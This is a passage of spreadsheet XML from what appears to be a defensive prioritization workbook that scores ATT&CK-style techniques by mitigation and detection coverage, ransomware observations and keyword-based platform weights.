      </c>
      <c r="D579" s="25" t="s">
        <v>1891</v>
      </c>
      <c r="E579" s="25" t="s">
        <v>1967</v>
      </c>
      <c r="F579" s="51">
        <v>0</v>
      </c>
      <c r="G579" s="51">
        <v>1</v>
      </c>
      <c r="H579" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I579">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J579">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K579">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L579">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M579" s="25">
        <v>0</v>
      </c>
      <c r="N579" s="51">
        <v>0</v>
      </c>
      <c r="O579" s="51">
        <v>0</v>
      </c>
      <c r="P579" s="51">
        <v>0</v>
      </c>
      <c r="Q579" s="51">
        <v>0</v>
      </c>
      <c r="R579" s="51"/>
      <c r="S579" s="51">
        <v>0</v>
      </c>
      <c r="T579" s="51"/>
      <c r="U579" s="51">
        <v>0</v>
      </c>
      <c r="V579" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W579">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X579">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y579">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z579">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA579">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB579">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC579" s="29" t="s">
        <v>1968</v>
      </c>
      <c r="AD579" s="25" t="str" cm="1">
        <f t="array" ref="AD579">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC579)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE579" s="25">
        <f>IF(AD579="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF579" s="25" t="str" cm="1">
        <f t="array" ref="AF579">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC579)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG579" s="25">
        <f>IF(AF579="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH579" s="25" t="str" cm="1">
        <f t="array" ref="AH579">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC579)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI579" s="25">
        <f>IF(AH579="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ579" s="25" t="str" cm="1">
        <f t="array" ref="AJ579">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC579)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK579" s="25">
        <f>IF(AJ579="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL579" s="25" t="str" cm="1">
        <f t="array" ref="AL579">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC579)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM579" s="25">
        <f>IF(AL579="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN579" s="64">
        <v>0</v>
      </c>
      <c r="AO579" s="51"/>
      <c r="AP579" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.9899999999999997E-3</v>
      </c>
      <c r="AQ579" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.9966666666666667E-2</v>
      </c>
      <c r="AR579" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.9966666666666667E-2</v>
      </c>
      <c r="AS579" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT579" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU579"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80" spans="1:47">
      <c r="A580" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B580" s="25">
        <f>SUM(H580,M580,V580)*(1+SUM(AE580,AG580,AI580,AK580,AM580))</f>
        <v>0.05</v>
      </c>
      <c r="C580" s="25" t="s">
        <v>1969</v>
      </c>
      <c r="D580" s="25" t="s">
        <v>1891</v>
      </c>
      <c r="E580" s="25" t="s">
        <v>1970</v>
      </c>
      <c r="F580" s="51">
        <v>0</v>
      </c>
      <c r="G580" s="51">
        <v>1</v>
      </c>
      <c r="H580" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I580">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J580">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K580">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L580">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M580" s="25">
        <v>0</v>
      </c>
      <c r="N580" s="51">
        <v>0</v>
      </c>
      <c r="O580" s="51">
        <v>0</v>
      </c>
      <c r="P580" s="51">
        <v>0</v>
      </c>
      <c r="Q580" s="51">
        <v>0</v>
      </c>
      <c r="R580" s="51"/>
      <c r="S580" s="51">
        <v>0</v>
      </c>
      <c r="T580" s="51"/>
      <c r="U580" s="51">
        <v>0</v>
      </c>
      <c r="V580" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W580">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X580">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y580">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z580">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA580">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB580">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC580" s="30"/>
      <c r="AD580" s="25" t="str" cm="1">
        <f t="array" ref="AD580">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC580)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE580" s="25">
        <f>IF(AD580="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF580" s="25" t="str" cm="1">
        <f t="array" ref="AF580">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC580)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG580" s="25">
        <f>IF(AF580="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH580" s="25" t="str" cm="1">
        <f t="array" ref="AH580">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC580)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI580" s="25">
        <f>IF(AH580="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ580" s="25" t="str" cm="1">
        <f t="array" ref="AJ580">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC580)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK580" s="25">
        <f>IF(AJ580="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL580" s="25" t="str" cm="1">
        <f t="array" ref="AL580">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC580)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM580" s="25">
        <f>IF(AL580="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN580" s="64">
        <v>0</v>
      </c>
      <c r="AO580" s="51"/>
      <c r="AP580" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ580" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR580" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS580" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT580" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU580"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row r="581" spans="1:47">
      <c r="A581" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B581" s="25">
        <f>SUM(H581,M581,V581)*(1+SUM(AE581,AG581,AI581,AK581,AM581))</f>
        <v>0.05</v>
      </c>
      <c r="C581" s="25" t="s">
        <v>1971</v>
      </c>
      <c r="D581" s="25" t="s">
        <v>1891</v>
      </c>
      <c r="E581" s="25" t="s">
        <v>1972</v>
      </c>
      <c r="F581" s="51">
        <v>0</v>
      </c>
      <c r="G581" s="51">
        <v>1</v>
      </c>
      <c r="H581" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I581">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J581">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K581">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L581">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M581" s="25">
        <v>0</v>
      </c>
      <c r="N581" s="51">
        <v>0</v>
      </c>
      <c r="O581" s="51">
        <v>0</v>
      </c>
      <c r="P581" s="51">
        <v>0</v>
      </c>
      <c r="Q581" s="51">
        <v>0</v>
      </c>
      <c r="R581" s="51"/>
      <c r="S581" s="51">
        <v>0</v>
      </c>
      <c r="T581" s="51"/>
      <c r="U581" s="51">
        <v>0</v>
      </c>
      <c r="V581" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W581">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X581">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y581">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z581">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA581">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB581">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC581" s="30"/>
      <c r="AD581" s="25" t="str" cm="1">
        <f t="array" ref="AD581">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC581)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE581" s="25">
        <f>IF(AD581="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF581" s="25" t="str" cm="1">
        <f t="array" ref="AF581">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC581)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG581" s="25">
        <f>IF(AF581="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH581" s="25" t="str" cm="1">
        <f t="array" ref="AH581">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC581)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI581" s="25">
        <f>IF(AH581="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ581" s="25" t="str" cm="1">
        <f t="array" ref="AJ581">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC581)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK581" s="25">
        <f>IF(AJ581="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL581" s="25" t="str" cm="1">
        <f t="array" ref="AL581">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC581)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM581" s="25">
        <f>IF(AL581="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN581" s="64">
        <v>0</v>
      </c>
      <c r="AO581" s="51"/>
      <c r="AP581" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ581" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR581" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS581" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT581" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU581" s="25">
        <f>parameters!$J$25*Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]/21 + parameters!$J$26*Table1[[#This Row],[Total Top Att&amp;ck Score ]]/3+parameters!$J$27*Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]/21*Table1[[#This Row],[Total Top Att&amp;ck Score ]]/3+parameters!$J$28*Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]/21*Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]/21</f>
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="6">
    <mergeCell ref="AN1:AU1"/>
    <mergeCell ref="F1:L1"/>
    <mergeCell ref="N2:Q2"/>
    <mergeCell ref="R2:U2"/>
    <mergeCell ref="N1:V1"/>
    <mergeCell ref="AC1:AL1"/>
  </mergeCells>
  <phoneticPr fontId="13" type="noConversion"/>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup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BF6A1-B37B-47A1-B9DE-28D575DCB641}">
  <dimension ref="A1:G8"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B1" sqref="B1:B1048576"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="15.95"/>
  <cols>
    <col min="1" max="1" width="9" style="8"/>
    <col min="2" max="2" width="43.625" style="8" customWidth="1"/>
    <col min="3" max="3" width="38.625" style="8" hidden="1" customWidth="1"/>
    <col min="4" max="4" width="33.5" style="8" hidden="1" customWidth="1"/>
    <col min="5" max="5" width="46.5" style="8" hidden="1" customWidth="1"/>
    <col min="6" max="6" width="47.5" style="8" customWidth="1"/>
    <col min="7" max="7" width="83.375" style="8" customWidth="1"/>
    <col min="8" max="8" width="9.125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" ht="15.75" customHeight="1">
      <c r="A1" s="4" t="s">
        <v>1973</v>
      </c>
      <c r="B1" s="5" t="s">
        <v>1974</v>
      </c>
      <c r="C1" s="76" t="s">
        <v>1975</v>
      </c>
      <c r="D1" s="76"/>
      <c r="E1" s="77"/>
    </row>
    <row r="2" spans="1:7">
      <c r="A2" s="6" t="s">
        <v>1976</v>
      </c>
      <c r="B2" s="7" t="s">
        <v>1977</v>
      </c>
      <c r="C2" s="7" t="s">
        <v>1978</v>
      </c>
      <c r="D2" s="7" t="s">
        <v>1979</v>
      </c>
      <c r="E2" s="7" t="s">
        <v>1980</v>
      </c>
      <c r="F2" s="8" t="s">
        <v>1981</v>
      </c>
      <c r="G2" s="8" t="s">
        <v>1982</v>
      </c>
    </row>
    <row r="3" spans="1:7" ht="50.25" customHeight="1">
      <c r="A3" s="66" t="s">
        <v>1983</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>1984</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>1985</v>
      </c>
      <c r="D3" s="2" t="s">
        <v>1985</v>
      </c>
      <c r="E3" s="2" t="s">
        <v>1985</v>
      </c>
      <c r="F3" s="2" t="s">
        <v>1985</v>
      </c>
      <c r="G3" s="10" t="s">
        <v>1986</v>
      </c>
    </row>
    <row r="4" spans="1:7" ht="110.25" customHeight="1">
      <c r="A4" s="66" t="s">
        <v>1987</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>1988</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>1989</v>
      </c>
      <c r="D4" s="3" t="s">
        <v>1990</v>
      </c>
      <c r="E4" s="3" t="s">
        <v>1991</v>
      </c>
      <c r="F4" s="9" t="s">
        <v>1992</v>
      </c>
      <c r="G4" s="10" t="s">
        <v>1993</v>
      </c>
    </row>
    <row r="5" spans="1:7" ht="129.75" customHeight="1">
      <c r="A5" s="66" t="s">
        <v>1994</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>1995</v>
      </c>
      <c r="C5" s="3" t="s">
        <v>1996</v>
      </c>
      <c r="D5" s="3" t="s">
        <v>1997</v>
      </c>
      <c r="E5" s="3" t="s">
        <v>1998</v>
      </c>
      <c r="F5" s="9" t="s">
        <v>1999</v>
      </c>
      <c r="G5" s="10" t="s">
        <v>2000</v>
      </c>
    </row>
    <row r="6" spans="1:7" ht="150">
      <c r="A6" s="66" t="s">
        <v>2001</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>2002</v>
      </c>
      <c r="C6" s="3" t="s">
        <v>2003</v>
      </c>
      <c r="D6" s="3" t="s">
        <v>2004</v>
      </c>
      <c r="E6" s="3" t="s">
        <v>2005</v>
      </c>
      <c r="F6" s="9" t="s">
        <v>2006</v>
      </c>
      <c r="G6" s="10" t="s">
        <v>2007</v>
      </c>
    </row>
    <row r="7" spans="1:7" ht="159.75" customHeight="1">
      <c r="D7" s="3" t="s">
        <v>2008</v>
      </c>
      <c r="E7" s="3" t="s">
        <v>2009</v>
      </c>
    </row>
    <row r="8" spans="1:7" ht="122.25" customHeight="1">
      <c r="D8" s="3" t="s">
        <v>2010</v>
      </c>
      <c r="E8" s="3" t="s">
        <v>2011</v>
      </c>
      <c r="F8" s="9"/>
      <c r="G8" s="10"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="C1:E1"/>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A336D-0BDC-6744-A042-4D6DEC987D92}">
  <dimension ref="A1:T567"/>
  <sheetViews>
    <sheetView zoomScale="110" zoomScaleNormal="110" workbookViewId="0">
      <selection activeCell="A2" sqref="A2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.875" defaultRowHeight="15"/>
  <cols>
    <col min="1" max="2" width="8.875" style="13"/>
    <col min="3" max="3" width="91.875" style="14" customWidth="1"/>
    <col min="4" max="7" width="8.875" style="14" customWidth="1"/>
    <col min="8" max="8" width="27.875" style="14" customWidth="1"/>
    <col min="9" max="9" width="90.125" style="14" customWidth="1"/>
    <col min="10" max="10" width="89.375" style="13" customWidth="1"/>
    <col min="11" max="11" width="63.375" style="14" customWidth="1"/>
    <col min="12" max="19" width="8.875" style="13" customWidth="1"/>
    <col min="20" max="20" width="56.875" style="13" customWidth="1"/>
    <col min="21" max="16384" width="8.875" style="13"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:20" ht="32.1">
      <c r="A1" s="11" t="s">
        <v>2012</v>
      </c>
      <c r="B1" s="11" t="s">
        <v>2013</v>
      </c>
      <c r="C1" s="12" t="s">
        <v>2014</v>
      </c>
      <c r="D1" s="12" t="s">
        <v>2015</v>
      </c>
      <c r="E1" s="12" t="s">
        <v>2016</v>
      </c>
      <c r="F1" s="12" t="s">
        <v>2017</v>
      </c>
      <c r="G1" s="12" t="s">
        <v>2018</v>
      </c>
      <c r="H1" s="12" t="s">
        <v>2019</v>
      </c>
      <c r="I1" s="12" t="s">
        <v>2020</v>
      </c>
      <c r="J1" s="11" t="s">
        <v>2021</v>
      </c>
      <c r="K1" s="12" t="s">
        <v>68</v>
      </c>
      <c r="L1" s="11" t="s">
        <v>2022</v>
      </c>
      <c r="M1" s="11" t="s">
        <v>2023</v>
      </c>
      <c r="N1" s="11" t="s">
        <v>2024</v>
      </c>
      <c r="O1" s="11" t="s">
        <v>2025</v>
      </c>
      <c r="P1" s="11" t="s">
        <v>2026</v>
      </c>
      <c r="Q1" s="11" t="s">
        <v>2027</v>
      </c>
      <c r="R1" s="11" t="s">
        <v>2028</v>
      </c>
      <c r="S1" s="11" t="s">
        <v>2029</v>
      </c>
      <c r="T1" s="11" t="s">
        <v>2030</v>
      </c>
    </row>
    <row r="2" spans="1:20" ht="80.099999999999994">
      <c r="A2" s="13" t="s">
        <v>338</v>
      </c>
      <c r="B2" s="13" t="s">
        <v>339</v>
      </c>
      <c r="C2" s="14" t="s">
        <v>2031</v>
      </c>
      <c r="D2" s="15" t="s">
        <v>2032</v>
      </c>
      <c r="E2" s="14" t="s">
        <v>2033</v>
      </c>
      <c r="F2" s="14" t="s">
        <v>2034</v>
      </c>
      <c r="G2" s="14" t="s">
        <v>2035</v>
      </c>
      <c r="H2" s="14" t="s">
        <v>2036</v>
      </c>
      <c r="I2" s="14" t="s">
        <v>2037</v>
      </c>
      <c r="J2" s="13" t="s">
        <v>2038</v>
      </c>
      <c r="K2" s="14" t="s">
        <v>341</v>
      </c>
      <c r="L2" s="13" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:20" ht="80.099999999999994">
      <c r="A3" s="13" t="s">
        <v>1485</v>
      </c>
      <c r="B3" s="13" t="s">
        <v>2039</v>
      </c>
      <c r="C3" s="14" t="s">
        <v>2040</v>
      </c>
      <c r="D3" s="15" t="s">
        <v>2041</v>
      </c>
      <c r="E3" s="14" t="s">
        <v>2034</v>
      </c>
      <c r="F3" s="14" t="s">
        <v>2034</v>
      </c>
      <c r="G3" s="14" t="s">
        <v>2042</v>
      </c>
      <c r="H3" s="14" t="s">
        <v>2036</v>
      </c>
      <c r="I3" s="14" t="s">
        <v>2043</v>
      </c>
      <c r="J3" s="13" t="s">
        <v>2038</v>
      </c>
      <c r="K3" s="14" t="s">
        <v>341</v>
      </c>
      <c r="L3" s="13" t="b">
        <v>1</v>
      </c>
      <c r="M3" s="13" t="s">
        <v>338</v>
      </c>
    </row>
    <row r="4" spans="1:20" ht="80.099999999999994">
      <c r="A4" s="13" t="s">
        <v>1492</v>
      </c>
      <c r="B4" s="13" t="s">
        <v>2044</v>
      </c>
      <c r="C4" s="14" t="s">
        <v>2045</v>
      </c>
      <c r="D4" s="15" t="s">
        <v>2046</v>
      </c>
      <c r="E4" s="14" t="s">
        <v>2034</v>
      </c>
      <c r="F4" s="14" t="s">
        <v>2034</v>
      </c>
      <c r="G4" s="14" t="s">
        <v>2042</v>
      </c>
      <c r="H4" s="14" t="s">
        <v>2036</v>
      </c>
      <c r="I4" s="14" t="s">
        <v>2043</v>
      </c>
      <c r="J4" s="13" t="s">
        <v>2038</v>
      </c>
      <c r="K4" s="14" t="s">
        <v>341</v>
      </c>
      <c r="L4" s="13" t="b">
        <v>1</v>
      </c>
      <c r="M4" s="13" t="s">
        <v>338</v>
      </c>
    </row>
